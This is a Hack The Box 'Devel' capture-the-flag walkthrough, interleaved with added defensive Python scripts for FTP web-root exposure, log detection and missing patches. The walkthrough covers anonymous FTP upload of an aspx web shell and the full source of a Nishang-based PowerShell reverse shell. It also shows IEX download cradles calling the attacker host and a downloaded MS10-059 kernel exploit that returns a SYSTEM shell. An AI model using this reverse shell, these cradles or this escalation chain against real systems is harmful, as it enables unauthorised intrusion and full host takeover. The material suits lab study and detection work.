Today we are going to solve another CTF challenge, “Devel”, which is categorised as a retired lab on Hack The Box for online penetration-testing practice. Challenges in this lab are very easy to complete, even for beginners.
Level: Beginners
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are accessible online, they have a static IP. The IP of Devel is 10.10.10.5, so let’s start with nmap port enumeration.
root@kali:~/htb/devel# nmap -sC 10.10.10.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-27 18:44 CET
Nmap scan report for 10.10.10.5
Host is up (0.027s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE
21/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 01-24-19  07:42PM                 2834 devel.aspx
| 01-27-19  10:59AM                 2859 file.aspx
| 01-26-19  11:41AM                 2857 gay.aspx
| 03-17-17  04:37PM                  689 iisstart.htm
| 01-25-19  12:47PM                 2877 mshell.aspx
| 01-26-19  11:46AM                    0 nogay.aspx
| 01-26-19  11:42PM                 2876 task.aspx
| 01-27-19  08:10AM                    6 test.html
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: IIS7

Nmap done: 1 IP address (1 host up) scanned in 24.69 seconds
Using the anonymous login you get access to the FTP server on port 21, and the session shows that anonymous users can also write to the directory.
root@kali:~/htb/devel# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
01-24-19  07:42PM                 2834 devel.aspx
01-27-19  10:59AM                 2859 file.aspx
01-26-19  11:41AM                 2857 gay.aspx
03-17-17  04:37PM                  689 iisstart.htm
01-25-19  12:47PM                 2877 mshell.aspx
01-26-19  11:46AM                    0 nogay.aspx
01-26-19  11:42PM                 2876 task.aspx
01-27-19  08:10AM                    6 test.html
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
ftp> bin
200 Type set to I.
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2817 bytes sent in 0.00 secs (47.1316 MB/s)
ftp>
We can see that an aspnet_client directory is present (together with iisstart.htm and welcome.png, the default IIS site content), so the FTP root is the IIS web root. We therefore upload an aspx web shell from the /usr/share/webshells/aspx folder on our Kali Linux machine.
This allows us to run system commands as the web server’s application pool account, and we can now gather more information about the system.
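From a defender’s point of view the two listings above already contain the whole finding: anonymous FTP, write access, and a directory that holds the default IIS site files, so anything dropped there with a server-side extension becomes executable over HTTP. The following Python script is an added example (it is not part of the original writeup) that parses a Windows-style FTP listing, recognises the IIS web-root markers and rates the exposure; the listing it uses is a constructed copy of a few lines from the page, and the login/write flags are passed in from what the FTP session showed.

```python
import re
from dataclasses import dataclass

# Constructed sample: a few lines in the shape of the Windows FTP `ls` output above.
SAMPLE_LISTING = """\
03-18-17  01:06AM       <DIR>          aspnet_client
01-24-19  07:42PM                 2834 devel.aspx
03-17-17  04:37PM                  689 iisstart.htm
01-25-19  12:47PM                 2877 mshell.aspx
01-27-19  08:10AM                    6 test.html
03-17-17  04:37PM               184946 welcome.png
"""

# One Windows FTP listing line: date, time, <DIR> or size in bytes, then the name.
LINE_RE = re.compile(r"^(\d{2}-\d{2}-\d{2})\s+(\d{2}:\d{2}[AP]M)\s+(<DIR>|\d+)\s+(\S.*)$")

# Extensions a web server executes instead of serving as static content.
SERVER_SIDE_EXT = (".aspx", ".asp", ".ashx", ".asmx", ".php", ".jsp")
# Files IIS 7 places in the default site root; two or more means "this is wwwroot".
IIS_DEFAULT_MARKERS = {"iisstart.htm", "welcome.png", "aspnet_client"}


@dataclass
class Entry:
    date: str
    time: str
    is_dir: bool
    size: int
    name: str


def parse_listing(text):
    """Parse Windows-style FTP listing text into Entry objects, skipping non-listing lines."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        date, time, size_or_dir, name = m.groups()
        is_dir = size_or_dir == "<DIR>"
        entries.append(Entry(date, time, is_dir, 0 if is_dir else int(size_or_dir), name.strip()))
    return entries


def server_side_scripts(entries):
    """Names of files the web server would execute if the FTP root is the web root."""
    return sorted(e.name for e in entries
                  if not e.is_dir and e.name.lower().endswith(SERVER_SIDE_EXT))


def looks_like_iis_webroot(entries):
    """True when the listing contains the default IIS site content."""
    return len({e.name for e in entries} & IIS_DEFAULT_MARKERS) >= 2


def assess(listing_text, anonymous_login, anonymous_write):
    """Combine the listing with what the FTP session showed into one rated finding."""
    entries = parse_listing(listing_text)
    webroot = looks_like_iis_webroot(entries)
    scripts = server_side_scripts(entries)
    if anonymous_login and anonymous_write and webroot:
        severity = "critical"   # anyone can drop an executable page into the site
    elif anonymous_login and webroot:
        severity = "high"       # the source of every page in the site is readable
    elif anonymous_login:
        severity = "medium"     # anonymous read of an unknown share
    else:
        severity = "info"
    return {"severity": severity, "webroot": webroot, "scripts": scripts}


if __name__ == "__main__":
    print(assess(SAMPLE_LISTING, anonymous_login=True, anonymous_write=True))
```

The check is deliberately conservative: it only calls a share the web root when at least two of the default IIS files are present, so a plain file drop that happens to contain an .aspx file is rated lower. The fix on the server side is either to remove write permission from the anonymous FTP user or, better, to point the FTP site at a directory that is not served by IIS at all.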
Without wasting time we use puckieshell443.ps1, a reverse shell based on Nishang’s Invoke-PowerShellTcp:
function Invoke-PowerShellTcp
{
    [CmdletBinding(DefaultParameterSetName="reverse")] Param(

        [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
        [String]
        $IPAddress,

        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
        [Int]
        $Port,

        [Parameter(ParameterSetName="reverse")]
        [Switch]
        $Reverse,

        [Parameter(ParameterSetName="bind")]
        [Switch]
        $Bind
    )

    try
    {
        #Connect back if the reverse switch is used.
        if ($Reverse)
        {
            $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
        }

        #Bind to the provided port if Bind switch is used.
        if ($Bind)
        {
            $listener = [System.Net.Sockets.TcpListener]$Port
            $listener.start()
            $client = $listener.AcceptTcpClient()
        }

        $stream = $client.GetStream()
        [byte[]]$bytes = 0..65535|%{0}

        #Send back current username and computername
        $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
        $stream.Write($sendbytes,0,$sendbytes.Length)

        #Show an interactive PowerShell prompt
        $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
        $stream.Write($sendbytes,0,$sendbytes.Length)

        while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
        {
            $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
            $data = $EncodedText.GetString($bytes,0, $i)
            try
            {
                #Execute the command on the target.
                $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
            }
            catch
            {
                Write-Warning "Something went wrong with execution of command on the target."
                Write-Error $_
            }
            $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
            $x = ($error[0] | Out-String)
            $error.clear()
            $sendback2 = $sendback2 + $x

            #Return the results
            $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
            $stream.Write($sendbyte,0,$sendbyte.Length)
            $stream.Flush()
        }
        $client.Close()
        if ($listener)
        {
            $listener.Stop()
        }
    }
    catch
    {
        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
        Write-Error $_
    }
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.15 -Port 443
Then transfer puckieshell443.ps1 to the victim’s system: serve it over HTTP from the attacking machine and fetch it with a PowerShell download cradle.
c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.5 - - [06/Feb/2019 15:05:51] "GET /puckieshell443.ps1 HTTP/1.1" 200 -
powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.15/puckieshell443.ps1')
Now it is time to execute that command through the uploaded web shell in a browser, at the URL shown below.
http://10.10.10.5/cmdpuck.aspx
After executing the command via the uploaded backdoor, come back to the Netcat listener and wait for the session.
c:\PENTEST>nc -lvp 443
listening on [any] 443 ...
10.10.10.5: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.5] 49163: NO_DATA
Windows PowerShell running as user DEVEL$ on DEVEL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>whoami
iis apppool\web
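Everything the shell stage needed to type on the box is visible in the page: an IEX + DownloadString cradle, a WebClient download, and a TcpClient/GetStream pair in the script itself. Those are exactly the strings PowerShell Script Block Logging (Event ID 4104) and process command-line auditing record, so a defender can match on them. The Python below is an added example (not part of the writeup and not a Nishang or Hack The Box artifact) that classifies log lines against three such patterns; the sample lines are constructed in the style of the commands on this page, not real log exports.

```python
import re

# Constructed sample lines, shaped like script-block / command-line log entries (not real logs).
SAMPLE_EVENTS = [
    "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.15/puckieshell443.ps1')",
    "PS> iex(new-object net.webclient).downloadstring('http://10.10.14.15/Sherlock.ps1')",
    "$client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port); $stream = $client.GetStream()",
    "(new-object net.webclient).downloadfile('http://10.10.14.20/MS10-059.exe', 'C:\\windows\\temp\\MS10-059.exe')",
    "Get-ChildItem C:\\inetpub\\wwwroot | Where-Object { $_.Length -gt 0 }",
]

# Each rule is a case-insensitive regex over a single logged line.
RULES = {
    # Fetch-and-execute in one statement: the classic in-memory loader.
    "download_cradle": re.compile(r"(?i)\b(iex|invoke-expression)\b.*download(string|file)\("),
    # Any WebClient download, with or without execution.
    "webclient_download": re.compile(r"(?i)new-object\s+(system\.)?net\.webclient\b.*\.download(string|file)\("),
    # Raw TCP client whose stream is read/written: the shape of a TCP reverse shell.
    "tcp_reverse_shell": re.compile(r"(?i)system\.net\.sockets\.tcpclient\b.*getstream\("),
}

# Rules that on their own justify an alert rather than a low-priority note.
HIGH_RULES = {"download_cradle", "tcp_reverse_shell"}


def classify(line):
    """Return the sorted list of rule names that match one logged line."""
    return sorted(name for name, rx in RULES.items() if rx.search(line))


def severity(rules):
    """Map matched rules to a triage level."""
    if any(r in HIGH_RULES for r in rules):
        return "high"
    if rules:
        return "medium"
    return "none"


def scan(lines):
    """Scan a list of log lines and return (index, rules, severity) for every hit."""
    hits = []
    for i, line in enumerate(lines):
        rules = classify(line)
        if rules:
            hits.append((i, rules, severity(rules)))
    return hits


if __name__ == "__main__":
    for idx, rules, sev in scan(SAMPLE_EVENTS):
        print(f"[{sev}] line {idx}: {', '.join(rules)}")
```

A string match like this is a first filter, not a verdict; the stronger signal in this particular chain is the process tree, because the cradle is launched by the IIS worker process (w3wp.exe spawning powershell.exe under the application pool identity), which an ordinary web application never does.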
Then we run Sherlock, a post-exploitation PowerShell script that checks the host for missing privilege-escalation patches:
PS C:\windows\temp> iex(new-object net.webclient).downloadstring('http://10.10.14.15/Sherlock.ps1')

Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Appears Vulnerable

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable
We also run Windows Exploit Suggester against the systeminfo output and note that this machine is additionally vulnerable to MS10-059 and MS11-046.
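Both Sherlock and Windows Exploit Suggester answer the same question: which security bulletins are missing from the installed hotfix list? The same check is what a patch-compliance job on the defending side should run. The script below is an added example (not the writeup’s code and not Sherlock or Windows Exploit Suggester) that parses constructed systeminfo-style text and reports bulletins whose KB is absent. The bulletin-to-KB table is my own assumption and should be verified against each Microsoft bulletin before it is relied on; the hotfix list in the sample is invented for the example.

```python
import re

# Constructed sample in the format of `systeminfo` output; the hotfix list is invented.
SAMPLE_SYSTEMINFO = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB977165
                           [02]: KB2305420
"""

# Bulletin -> KB mapping for the bulletins named on this page.
# Assumption: verify each pair against the Microsoft bulletin before relying on it.
BULLETIN_KB = {
    "MS10-015": "KB977165",   # User Mode to Ring (KiTrap0D)
    "MS10-059": "KB982799",   # Tracing feature for services (Chimichurri)
    "MS10-092": "KB2305420",  # Task Scheduler .XML
    "MS11-046": "KB2503665",  # Ancillary Function Driver
    "MS15-051": "KB3045171",  # ClientCopyImage Win32k
}


def parse_systeminfo(text):
    """Pull OS version, architecture and installed KB numbers out of systeminfo text."""
    info = {}
    m = re.search(r"^OS Version:\s*(\S+)", text, re.M)
    info["os_version"] = m.group(1) if m else None
    m = re.search(r"^System Type:\s*(\S+)", text, re.M)
    info["arch"] = m.group(1) if m else None
    # KB numbers are 6 or 7 digits; collecting them anywhere in the text tolerates wrapped lines.
    info["hotfixes"] = set(re.findall(r"\bKB\d{6,7}\b", text))
    return info


def missing_patches(info, catalogue=BULLETIN_KB):
    """Bulletins from the catalogue whose KB is not in the installed hotfix set."""
    return sorted(b for b, kb in catalogue.items() if kb not in info["hotfixes"])


def report(text, catalogue=BULLETIN_KB):
    """Human-readable summary for one host."""
    info = parse_systeminfo(text)
    missing = missing_patches(info, catalogue)
    lines = [f"OS {info['os_version']} ({info['arch']}), {len(info['hotfixes'])} hotfix(es) installed"]
    for bulletin in missing:
        lines.append(f"  missing {bulletin} ({catalogue[bulletin]})")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_SYSTEMINFO))
```

The caveat that applies to every tool of this kind, including the two used in the writeup, is that a KB can be absent because the product was never affected (different edition, architecture or service pack), so "missing" means "candidate to confirm", and the authoritative answer is the bulletin’s affected-software table. On the defending side, a host that reports this many missing kernel patches is an unpatched build, and patching it closes the whole escalation path used below.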
https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS10-059/MS10-059.exe
c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.5 - - [06/Feb/2019 19:23:11] "GET /puckieshell443.ps1 HTTP/1.1" 200 -
10.10.10.5 - - [06/Feb/2019 19:30:21] "GET /MS10-059.exe HTTP/1.1" 200 -
PS C:\windows\temp> (new-object net.webclient).downloadfile('http://10.10.14.20/MS10-059.exe', 'C:\windows\temp\MS10-059.exe')
PS C:\windows\temp> dir MS10-059.exe

    Directory: C:\windows\temp

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         10/2/2019   3:37 ??      51434 lp.exe
-a---         10/2/2019   4:24 ??     784384 MS10-059.exe
PS C:\windows\temp> ./MS10-059.exe 10.10.14.20 9876
/Chimichurri/-->This exploit gives you a Local System shell
/Chimichurri/-->Changing registry values...
/Chimichurri/-->Got SYSTEM token...
/Chimichurri/-->Running reverse shell...
/Chimichurri/-->Restoring default registry values...
Wonderful!! We have completed the task and hacked this box: the listener on port 9876 receives a shell as SYSTEM.
C:\Users\jacco>nc -lvp 9876
listening on [any] 9876 ...
10.10.10.5: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.5] 49170: NO_DATA
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\users\public>whoami
whoami
nt authority\system
c:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
e62*****b4b
PS C:\windows\temp> (New-Object System.Net.WebClient).DownloadFile("http://10.10.14.20/MS10-015.zip", "C:\Windows\Temp\MS10-015.zip")
A simple way of using ExtractToDirectory from System.IO.Compression.ZipFile:
# Load the .NET assembly that provides System.IO.Compression.ZipFile
Add-Type -AssemblyName System.IO.Compression.FileSystem
function unzip {
    param( [string]$ziparchive, [string]$extractpath )
    # Extract every entry of $ziparchive into $extractpath (the directory is created if missing)
    [System.IO.Compression.ZipFile]::ExtractToDirectory( $ziparchive, $extractpath )
}
unzip "D:\file.zip" "C:\temp"
Author: Puckiestyle